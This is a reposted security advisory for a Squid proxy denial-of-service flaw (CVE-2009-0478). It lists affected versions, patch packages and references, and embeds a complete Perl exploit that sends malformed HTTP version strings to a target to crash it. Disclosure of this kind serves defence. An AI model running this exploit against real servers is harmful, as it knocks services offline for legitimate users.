Home » Exploits » Squid Web Proxy Cache HTTP Version Number Parsing Denial of Service Vulnerability Squid Web Proxy Cache HTTP Version Number Parsing Denial of Service Vulnerability Feeds - Exploits Written by Joshua Morin, Mikko Varpiola, and Jukka Taimisto    Monday, 02 March 2009 22:44 Squid Web Proxy Cache HTTP Version Number Parsing Denial of Service Vulnerability -\\Bugtraq ID: 33604 -\\Class: Failure to Handle Exceptional Conditions -\\CVE: CVE-2009-0478 -\\Remote: Yes -\\Local: No -\\Published: Feb 02 2009 12:00AM -\\Updated: Mar 02 2009 02:16PM -\\Credit: Joshua Morin, Mikko Varpiola, and Jukka Taimisto -\\Vulnerable: Ubuntu Ubuntu Linux  8.10 sparc Ubuntu Ubuntu Linux  8.10 powerpc Ubuntu Ubuntu Linux  8.10 lpia Ubuntu Ubuntu Linux  8.10 i386 Ubuntu Ubuntu Linux  8.10 amd64 Squid Web Proxy Cache 3.1 4 Squid Web Proxy Cache 3.0 Squid Web Proxy Cache  3.1 Squid Web Proxy Cache  3.0.STABLE7 Squid Web Proxy Cache  3.0.STABLE6 Squid Web Proxy Cache  3.0.STABLE5 Squid Web Proxy Cache  3.0.STABLE4 Squid Web Proxy Cache  3.0.STABLE3 Squid Web Proxy Cache  3.0.STABLE2 Squid Web Proxy Cache  3.0.STABLE12 Squid Web Proxy Cache  3.0.STABLE1 Squid Web Proxy Cache  2.7.STABLE5 Squid Web Proxy Cache  2.7 S.u.S.E. openSUSE  11.1 RedHat Fedora 9  0 MandrakeSoft Linux Mandrake  2009.0 x86_64 MandrakeSoft Linux Mandrake  2009.0 MandrakeSoft Linux Mandrake  2008.1 x86_64 MandrakeSoft Linux Mandrake  2008.1 -\\Not Vulnerable: Squid Web Proxy Cache 3.1 5 Squid Web Proxy Cache  3.0.STABLE13 Squid Web Proxy Cache  2.7.STABLE6 -\\Discussion Squid is prone to a remote denial-of-service vulnerability because the proxy server fails to handle certain HTTP requests. Successfully exploiting this issue allows remote attackers to crash the affected application, denying further service to legitimate users. This issue affects versions prior to Squid 2.7.STABLE5, Squid 3.0.STABLE12, and Squid 3.1.0.4. -\\Exploit(s)/PoC(s): An attacker may exploit this issue by using readily available networking tools. The following exploit is available: =============================================================== 33604.pl ^^^^^^^^^ #!usr/bin/perl -w ######################################################################################## # #    Reference: #    http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0478 #     http://www.securityfocus.com/bid/33604/discuss # #$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$ #$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$ # #         Visit:        http://www.evilfingers.com/ #        Author:    Praveen Dar$hanam #        Email:     praveen[underscore]recker[at]sify.com\ #        Blog:      http://www.darshanams.blogspot.com/ #        Date:      09th February, 2009 # ############Special thanx2 Joshua Morin, Mikko Varpiola, and Jukka Taimisto ############ ######################################################################################## ######Thanx to str0ke,milw0rm, @rp m@n,security folks and all INDIAN H@CKER$############ ######################################################################################## use IO::Socket; print("\nEnter IP Address of Vulnerable Server: \n"); $vuln_server_ip = <STDIN>; chomp($vuln_server_ip); @malicious_version=("9.9","%.%","%%","#.#","\$.\$","*.*","975.975","10000999"); foreach $mal (@malicious_version) {    $sock_http = IO::Socket::INET->new(  PeerAddr => $vuln_server_ip,                                      PeerPort => 80,                                      Proto    => 'tcp') || "Unable to connect to HTTP Server";    $http_attack = "GET / HTTP/$mal\r\n".    "Host: $vuln_server_ip\r\n".    "Keep-Alive: 300\r\n".    "Connection: keep-alive\r\n\r\n";    print $sock_http $http_attack;    sleep(3);    close($sock_http); } -\\Solution Updates are available. Please see the references for more information. Ubuntu Ubuntu Linux  8.10 lpia --Ubuntu  squid-cgi_2.7.STABLE3-1ubuntu2.1_lpia.deb http://ports.ubuntu.com/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_lpia.dehttp://ports.ubuntu.com/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_lpia.deb --Ubuntu  squid_2.7.STABLE3-1ubuntu2.1_lpia.deb http://ports.ubuntu.com/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_lpia.dehttp://ports.ubuntu.com/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_lpia.deb MandrakeSoft Linux Mandrake  2008.1 x86_64 --Mandriva  squid-3.0-1.1mdv2008.1.x86_64.rpm http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/ --Mandriva  squid-cachemgr-3.0-1.1mdv2008.1.x86_64.rpm http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/ MandrakeSoft Linux Mandrake  2008.1 --Mandriva  squid-3.0-1.1mdv2008.1.i586.rpm http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/ --Mandriva  squid-cachemgr-3.0-1.1mdv2008.1.i586.rpm http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/ Ubuntu Ubuntu Linux  8.10 sparc --Ubuntu  squid-cgi_2.7.STABLE3-1ubuntu2.1_sparc.deb http://ports.ubuntu.com/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_sparc.dehttp://ports.ubuntu.com/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_sparc.deb --Ubuntu  squid_2.7.STABLE3-1ubuntu2.1_sparc.deb http://ports.ubuntu.com/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_sparc.dehttp://ports.ubuntu.com/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_sparc.deb MandrakeSoft Linux Mandrake  2009.0 --Mandriva  squid-3.0-8.1mdv2009.0.i586.rpm http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/ --Mandriva  squid-cachemgr-3.0-8.1mdv2009.0.i586.rpm http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/ Ubuntu Ubuntu Linux  8.10 powerpc --Ubuntu  squid-cgi_2.7.STABLE3-1ubuntu2.1_powerpc.deb http://ports.ubuntu.com/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_powerpc.dehttp://ports.ubuntu.com/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_powerpc.deb --Ubuntu  squid_2.7.STABLE3-1ubuntu2.1_powerpc.deb http://ports.ubuntu.com/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_powerpc.dehttp://ports.ubuntu.com/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_powerpc.deb Ubuntu Ubuntu Linux  8.10 i386 --Ubuntu  squid-cgi_2.7.STABLE3-1ubuntu2.1_i386.deb http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_i386.dehttp://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_i386.deb --Ubuntu  squid_2.7.STABLE3-1ubuntu2.1_i386.deb http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_i386.dehttp://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_i386.deb MandrakeSoft Linux Mandrake  2009.0 x86_64 --Mandriva  squid-3.0-8.1mdv2009.0.x86_64.rpm http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/ --Mandriva  squid-cachemgr-3.0-8.1mdv2009.0.x86_64.rpm http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/ Ubuntu Ubuntu Linux  8.10 amd64 --Ubuntu  squid-cgi_2.7.STABLE3-1ubuntu2.1_amd64.deb http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_amd64.dehttp://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.7.STABLE3-1ubuntu2.1_amd64.deb --Ubuntu  squid_2.7.STABLE3-1ubuntu2.1_amd64.deb http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_amd64.dehttp://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.7.STABLE3-1ubuntu2.1_amd64.deb -\\Reference(s) --Squid Web Proxy Cache Homepage http://www.squid-cache.org  (Squid) --Squid Proxy Cache Denial of Service in request handling http://www.securityfocus.com/archive/1/50065  (Amos Jeffries < This e-mail address is being protected from spambots. You need JavaScript enabled to view it >) --Squid Proxy Cache Security Update Advisory SQUID-2009:1 http://www.squid-cache.org/Advisories/SQUID-2009_1.tx  (Squid)

Security Services by HSC Contact us Become partner Advertise with us Join our staff